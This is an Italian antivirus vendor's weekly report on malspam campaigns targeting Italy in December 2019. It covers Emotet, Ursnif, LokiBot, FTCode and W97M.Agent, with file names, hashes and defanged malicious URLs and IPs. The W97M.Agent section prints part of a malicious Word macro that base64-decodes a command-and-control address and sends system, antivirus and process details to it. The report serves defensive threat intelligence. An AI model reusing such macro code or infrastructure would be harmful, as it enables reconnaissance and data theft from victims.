TG Soft Security Software Specialist - Vir.IT eXplorer: AntiVirus-AntiSpyware-AntiMalware-AntiRansomware
Identifica virus/malwareIdentifica virus polimorfici grazie a DEEP SCANMacro Virus AnalyzerTecnologia INTRUSION DETECTIONTools rimozione virus/malwareInstallazione su Active DirectoryProtezione Real-Time 16/32/64 bitVir.IT Scan MailVir.IT Console Client/ServerVir.IT WebFilter ProtectionAggiornamenti automatici Live-UpdateVir.IT Personal FirewallAssistenza tecnica in lingua italianaCentro Ricerche Anti Malware


Attiva la tua Licenza Invia file sospetto Newsletter

fb rss linkedin twitter

ECSM European Cyber Security Month ICSA Lab

Vir.IT eXplorer PRO supera il test internazionale VB100 2019-06

AMTSO

OpsWat



EICAR Membro SERIT - Security Research in ITaly

09/12/2019 18:34:35 - 2019W49 Report settimanale => 07-13/12 2K19 campagne MalSpam target Italia

       
week42

Report settimanale delle campagne italiane di malspam a cura del C.R.A.M. di TG Soft.

Di seguito i dettagli delle campagne diffuse in modo massivo nella settimana appena trascorsa dal 07 dicembre 2019 al 13 dicembre 2019: Ursnif, Emotet, LokiBot, FTCode, W97M.Agent

INDICE

 ==> 09 dicembre 2019 => FTCode - LokiBot - Ursnif - Emotet
 
 ==> 
10 dicembre 2019 => Emotet - LokiBot

 ==> 
11 dicembre 2019 => Ursnif - Emotet

 ==> 
12 dicembre 2019 => Emotet - LokiBot - W97M.Agent

 ==> 13 dicembre 2019 => Emotet
 

 
==> Consulta le campagne del mese di Novembre


09 dicembre 2019

FTCode

 

ScanDocumento__60277fa4d53f30427b688d8a99ff8a3cb.vbs
MD5: 111629748e62cf22f381eedf8b7ed9e4
Dimensione: 3145729 Bytes
VirITTrojan.VBS.Dwnldr.BWN

WindowsIndexingService.vbs
MD5: eae3510e1da8d14f8b96e38283804b78
Dimensione: 229144 Bytes
VirITTrojan.VBS.FTCode.BWM

IOC:
111629748e62cf22f381eedf8b7ed9e4
eae3510e1da8d14f8b96e38283804b78

p://way.securewebgateway[.]com
p://www.luigicafagna[.]it
p://ese.emarv[.]com

 



Torna ad inizio pagina

LokiBot


PI 7635427 E DOCUMENTI DI PAGAMENTO_PDF.exe
MD56c7bf873c01b860653858441ed78f28a
Dimensione: 142848 Bytes
VirITTrojan.Win32.Genus.BWK

IOC
:
6c7bf873c01b860653858441ed78f28a

p://onllygooodam[.]com 


Torna ad inizio pagina

Ursnif


MIL0001785236.xls
MD5: C5E1106F9654A23320132CBC61B3F29D
Dimensione: 64000 Bytes
VirIT: X97M.Downloader.BWK


Payload Ursnif
MD5: 4B2D76784A93662DC60317E011464ED6
Dimensione: 176128 Bytes
VirIT: Trojan.Win32.Ursnif.BWK

 
Versione: 214107
Gruppo: 2052
Key: 10291029JSJUYUON



IOC:
C5E1106F9654A23320132CBC61B3F29D
4B2D76784A93662DC60317E011464ED6

sutsyiekha[.]casa/microsoft.com?03000200-0400-0500-0006-000700080009
94.100.28[.]184


Torna ad inizio pagina

Emotet 


Certificato medico-4673298_06-12-2019_5_.doc
MD5: e4863940ac5c23ecb0962a909d6e336a
Dimensione: 91097 Bytes
VirIT: W97M.Downloader.BWJ

CHUNKERTCG.EXE
MD5: c1adfcc38051d2223e34787ee9f68d8d
Dimensione: 647199 Bytes
VirITTrojan.Win32.Emotet.BWK


IOC
:
e4863940ac5c23ecb0962a909d6e336a
c1adfcc38051d2223e34787ee9f68d8d

s://nagel.pintogood[.]com/wp-admin/nge9688/
p://recreate.bigfilmproduction[.]com/wp-includes/2x8vf9j1507/
s://www.nineti9[.]com/6ui7m/xlswdj6/
p://invision-me[.]com/wp-includes/9z37501/
p://hanaimchurch[.]net/j6d645b/059dgrz7/

Torna ad inizio pagina 

 

10 dicembre 2019

Emotet


Fattura 96189.doc
MD5: 5fc5c8fb0eae111150be9a64566bd737
Dimensione: 180918 Bytes
VirIT: W97M.Downloader.BWM

printsxcl.exe
MD5: 2f9cac9175a4c6ffaf2890c89dd49c25
Dimensione: 491520 Bytes
VirITTrojan.Win32.Emotet.BWN


IOC
:
5fc5c8fb0eae111150be9a64566bd737
2f9cac9175a4c6ffaf2890c89dd49c25

p://myphamthuydung[.]com/tmp/bwo
p://lalletera[.]cat/bootstrap/ilym/
s://www.primepenguin[.]com/wp-admin/fefkbm/
s://www.ukrembtr[.]com/wp-admin/s3OYk/
s://shourayinfotech[.]xyz/wp-includes/pa1uxi/
 

Torna ad inizio pagina

LokiBot


confermare la SPEDIZIONE UPS 4765232__PDF.exe
MD5: f8ea2be7b5abacf2729d7e3936bc6fa3
Dimensione: 265216 Bytes
VirIT: Trojan.Win32.Genus.BWM

IOC:
f8ea2be7b5abacf2729d7e3936bc6fa3

p://onllygooodam[.]com


Risorsa trovato all'interno del file analizzato:
 




Torna ad inizio pagina

 

11 dicembre 2019

Ursnif



Nuovo documento 1.vbs
MD5: DC04DA0A3714C62362C8711161AE19AF
Dimensione: 4032719  Bytes
VirIT: Trojan.VBS.Dwnldr.BWO


ColorPick.exe
MD5: E5CF434F3D54C1882B1366C2DCD1CF3E
Dimensione: 177176  Bytes
VirIT: Trojan.Win32.Ursnif.BWO

 
Versione: 300814
Gruppo: 20198141
Key: Hr21hSYlL7OMQFRy



IOC:
DC04DA0A3714C62362C8711161AE19AF
E5CF434F3D54C1882B1366C2DCD1CF3E

p://customerspick[.]com/lqqx?yfrri=158194
p://hintdeals[.]com/paginfo52.php
s://sscupace[.]xyz

  

Emotet



Info.doc
MD571ed5b79d9156d6048de3d2a4e537865
Dimensione: 74384 Bytes
VirITW97M.Downloader.MP

printsxcl.exe
MD50687f6677026a09a9df7cc96bd47bd22
Dimensione: 430243 Bytes
VirITTrojan.Win32.Emotet.BWO 

IOC:
71ed5b79d9156d6048de3d2a4e537865
0687f6677026a09a9df7cc96bd47bd22

p://modiracc[.]com/wp-admin/k6f1/
p://www.billrothhospitals[.]com/wp-includes/99nooe0/
p://opticsbd[.]com/office365.login.com/8q70079/
p://birdlandonetoone[.]com/blogs/ie9co6496/
p://860259[.]com/tmp/hm92/



12 dicembre 2019

Emotet


MESSAGIO_2019_4735096.doc
MD5: db3c9463d878b05ca1a222c7dbcd60b0
Dimensione: 171135 Bytes
VirIT: W97M.Downloader.BWP

printsxcl.exe
MD5: 15d8bf6f8d53844f367076f25ea43bc8
Dimensione: 338927 Bytes
VirITTrojan.Win32.Emotet.BVX


IOC:
db3c9463d878b05ca1a222c7dbcd60b0
15d8bf6f8d53844f367076f25ea43bc8

p://jdcc-stu[.]com/wp-includes/6109/
p://jandmadventuring.servermaintain[.]com/wp-content/uploads/8ly08u77849/
p://wilkopaintinc[.]com/common_resource/qac395/
p://essemengineers[.]com/AdminPanel/cku0s00262/
p://t666v[.]com/vlk2lo4i/fi20416/



Torna ad inizio pagina

LokiBot


pagamento rapido.exe
MD5: 68574c499813aed2b3b28d507d013515
Dimensione: 925184 Bytes
VirIT: Trojan.Win32.PSWStealer.BWQ


IOC:
68574c499813aed2b3b28d507d013515

p://elettroveneta-it[.]com
31.31.72[.]73


Torna ad inizio pagina
 
 

W97M.Agent.BWS


sda-express-108943.doc
MD5: 649c2d11a4a58f0101ed016c73355e32
Dimensione: 94900 Bytes
VirITW97M.Agent.BWS


La MACRO presente all'interno del file DOC in allegato alla mail contiene il seguent codice:

Function Main()
    Dim myURL As String
    myURL = Base64DecodeString("aHR0cDovLzE5Mi4yMzYuMTU1LjE3L2luZm8xLnBocD9pZD0=") & Base64EncodeString(GetDocName & "|" & GetComputerInfo & "|" & GetOSInfo & "|" & GetAV & "|" & GetProc)
[...]
End Function

Function GetAV()
[...]
End Function

Function GetProc()
[...]
End Function

Function GetDocName()
[...]
End Function

Function GetComputerInfo()
[...]
End Function

Function GetOSInfo()
[...]
End Function
 

L'URL a cui vengono inviati i dati estrapolati dal computer della vittima è http://192.236.155[.]17/info1.php?id=, i dati che vengono prelevati attivando la MACRO presente nel documento Word sono:

"document_name:"
"computer_name:"
"user_name:"
"domain:"
"domain_role:"
"workgroup:"
"manufacturer:"
"model:"
"system_type:"
"av:"
"processes:"
"os_name:"
"os_version:"

Gli allegati Word di questa campagna sono composti da una parte fissa ed un numero variabile, questo numero identifica l'ID della vittima e di conseguenza l'indirizzo email della vittima.

Esempio: sda-express-[ID NUMERICO].doc



IOC:
649c2d11a4a58f0101ed016c73355e32
 
p://192.236.155[.]17/info1.php?id=

sda-express[.]xyz - IP: 104.168.218.127
sda-express[.]icu - IP: 104.168.218.226
sdaexpress[.]icu  - IP: 104.168.219.27

13 dicembre 2019

Emotet


Info 1312 KT_7730572
MD5: 19045e4fb253f3d4e77c21295f0d43df
Dimensione: 74471 Bytes
VirIT: W97M.Downloader.BWR

printsxcl.exe
MD5: 58d5232431beddec9e549a5378cffd2a
Dimensione: 307200 Bytes
VirITTrojan.Win32.Emotet.BWR


IOC:
19045e4fb253f3d4e77c21295f0d43df
58d5232431beddec9e549a5378cffd2a

p://gunnertalk[.]com/wp-admin/2z07/
p://hasbrew[.]com/includes/zw21y53110/
p://greencrosscc[.]com/contact-form/7c457119/
p://gessuofk[.]net/test/6ns631/
p://rampbay[.]com/var/r3kb2/


 

Consulta le campagne del mese di Novembre/Dicembre

Vi invitiamo a consultare i report del mese di Novembre/Dicembre, per rimanere aggiornati sulle campagne di malspam circolanti in Italia:

30/11/2019 = Report settimanale delle campagne italiane di Malspam dal 30 novembre al 06 dicembre 2019
23/11/2019 = Report settimanale delle campagne italiane di Malspam dal 23 novembre al 29 novembre 2019
16/11/2019 = Report settimanale delle campagne italiane di MalSpam dal 16 novembre al 22 novembre 2019

C.R.A.M. 
Centro Ricerche Anti-Malware di TG Soft 

Utilizzabilità delle informative e delle immagine in esse contenute

Ogni informazione pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook a patto che venga sempre e comunque citata la fonte "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini. Inoltre per ogni immagine utilizzata dovrà essere sempre indicata la fonte ed il link cliccabile alla pagina originale dell'informativa di prima pubblicazione. Per quanto riguarda le pubblicazioni cartacee sarà necessario citare la fonte esplicitamente "Fonte: C.R.A.M. by TG Soft www.tgsoft.it" ed in analogia alle pubblicata elettroniche i link sotto ad ogni immagine alla pagina web originale da cui sono state estratte.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito "Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]"

fb rss linkedin twitter
 




Legal & Eula | Privacy | Disinstallazione

TG Soft S.r.l. - via Pitagora 11/b, 35030 Rubàno (PD), ITALIA - C.F. e P.IVA 03296130283